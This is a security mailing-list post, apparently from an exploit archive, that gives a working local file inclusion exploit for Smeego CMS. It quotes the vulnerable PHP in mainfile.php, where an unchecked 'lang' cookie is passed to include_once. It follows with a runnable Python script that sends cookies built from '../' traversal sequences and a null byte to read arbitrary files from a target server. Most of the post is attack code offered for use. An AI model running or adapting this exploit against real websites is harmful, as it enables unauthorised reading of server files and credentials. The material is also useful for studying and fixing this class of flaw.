<<< Date Index >>>     <<< Thread Index >>>

Smeego CMS vulnerability

# Smeego CMS Local File Include Exploit
#                 by
# 0in from Dark-Coders Programming & Security Group
# >>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<
#--------------------------------------------------------
# Contact: 0in(dot)email[at]gmail(dot)com
#--------------------------------------------------------
# Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor
#--------------------------------------------------------
# Description:
# Smeego is a Content Management System or Portal
# System written in PHP and designed to be
# easy to install and use. Smeego has a mature code 
# and comes with cool modules and themes 
# for you to start your own dynamic and database 
# driven website. Bla bla Bla [...]
# -------------------------------------------------------
# Script home: http://smeego.com
# -------------------------------------------------------
# Vuln:
#   >>>>>> File: mainfile.php <<<<<<<
#if ($display_errors == 1) {  // We don't se any errors ;(
#  @ini_set('display_errors', 1);
#} else {
#  @ini_set('display_errors', 0);
#}
#
#if (isset($newlang)) {
#
#       if (file_exists("language/lang-".$newlang.".php")) {
#                setcookie("lang",$newlang,time()+31536000);
#                include_once("language/lang-".$newlang.".php");
#                $currentlang = $newlang;
#        } else {
#                setcookie("lang",$language,time()+31536000);
#                include_once("language/lang-".$language.".php");
#                $currentlang = $language;
#        }
#} elseif (isset($lang)) {
#
#        include_once("language/lang-".$lang.".php");
#        $currentlang = $lang;
#} else {
#        setcookie("lang",$language,time()+31536000);
#        include_once("language/lang-".$language.".php");
#        $currentlang = $language;
#}
#      >>>>>> End <<<<<<<
# So.. We can send Cookie: lang=[lfi]

# -------------------------------------------------------

# Simple Python Exploit:

#!/usr/bin/python
import sys
import time
import httplib
print '====================================================='
print '        Smeego CMS Local File INclude Exploit         '
print '                      by                             '
print ' 0in from Dark-Coders Programming & Security Group!  '
print '             http://dark-coders.4rh.eu               '
print '====================================================='
try:
        target=sys.argv[1]
        path=sys.argv[2]
        file=sys.argv[3]
except Exception:
        print '\nUse: %s [target] [path] [file]' % sys.argv[0]
        quit()
i=0
lfi='../'
target+=":80"
special="%00"
file+=special
for i in range(9):
        lfi+="../"
        print '---------------------------------------------------------'
        mysock=httplib.HTTPConnection(target)
        mysock=httplib.HTTPConnection(target)
        mysock.putrequest("GET",path)
        mysock.putheader("User-Agent","Billy Explorer v666")
        mysock.putheader('Accept', 'text/html')
        mysock.putheader('Accept-Language',' en-us,en;q=0.5')
        mysock.putheader('Cookie','lang=%s%s' % (lfi,file))
        mysock.endheaders()
        reply=mysock.getresponse()
        print reply.read()
        time.sleep(2)
        mysock.close()
        print '----------------------------------------------------------'

#EOFF